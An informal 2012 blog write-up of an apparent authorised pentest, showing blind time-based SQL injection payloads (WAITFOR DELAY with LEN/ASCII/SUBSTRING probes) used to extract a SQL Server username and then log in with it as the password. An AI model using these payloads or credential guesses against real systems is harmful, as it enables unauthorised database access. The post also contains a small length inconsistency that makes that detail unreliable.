Tuesday, October 23, 2012

MySQL Blind Time Based Technique

O hye everyone! seems my blog full with XSS collections nowdays and yeah..some of you might not interest in these stuff since its quite childish..but well..i'm too lazy to update my blog LOL.

But today,I felt guilty for my blog and here you go..another experience with my client for their client/server application.

Remember this Blind Oracle Injection in client/server on my previous previous preeeeviiiiooouussss post? haha. well this time, few weeks ago, I had instructed by boss to do a pentest on one of the client's application.
The application using java servlet environment as well, a client/server application. Well, this time I cant use my own computer. Need to use their development testing computer. Without any internet connection, it quite tough for me to gain some information from the internet.

Browsing a little on the application. Checking how it works..hurmm..nothing interesting..just a simple client/server application but quite complicated module such the previous I did tested..
hmmm..ouh?! suddenly..
there's a search box where I can try to search a valid customer by entering their name...ahaa..this quite interesting..its similar to the previous thing I found.
I tried to check a valid user.
ahaa..ahaa..its appear..

then..with the power of single quote!

woops!!! OMG! OMG! OMG!..haha..so there's a probability SQL Injection on it! owh how lucky.

but since there are some limitation on it. I tried to count columns,its available but using a union based method wont successfull. hurmm..
what is should do? ah.go for lunch first :D

during my lunch, I tried to browse some good information on SQLi. owh yeah, since I already know the backend of the server is running on SQL Server, this will narrow up my point of search.
here are some of my reference
and of course the greatest cheatsheet, http://pentestmonkey.net/category/cheat-sheet

back from lunch!
Trying my luck!
bazinga; 1' IF (LEN(USER)=7) WAITFOR DELAY '0:0:10'-- 
it gives a FALSE reply.
* the server will not wait a 10 secs delay since the length of the current user is not 7 chars. 

bazinga; 1' IF (LEN(USER)=8) WAITFOR DELAY '0:0:10'-- 
auw yeah..a TRUE reply
* the server will  wait a 10 secs delay since the length of the current user is exactly 8 chars.

then proceeding to check the current user in case the client need another POC.

bazinga; 1' IF (ASCII(lower(substring((USER),1,1)))>105) WAITFOR DELAY '0:0:10'-- 
its J
bazinga; 1' IF (ASCII(lower(substring((USER),2,1)))>49) WAITFOR DELAY '0:0:5'-- 
its 2
bazinga; 1' IF (ASCII(lower(substring((USER),3,1)))>101) WAITFOR DELAY '0:0:5'-- 
its E
bazinga; 1' IF (ASCII(lower(substring((USER),4,1)))>101) WAITFOR DELAY '0:0:5'-- 
its E
bazinga; 1' IF (ASCII(lower(substring((USER),5,1)))>106) WAITFOR DELAY '0:0:5'-- 
its another J
and no need to proceed anymore since already can guess the current user is j2eejdb

and then,trying my luck using the username as the password as well to connect to the sql server.

gotcha! I'm in it!
thanks for reading :)

p/s boss.if you're reading this..please..dont let me struggling with this client/server application anymore..pleaaseeeee.hahahaa..but,I'll do if there's a..*cough2..increment or..*cough2.bonus..*cough :P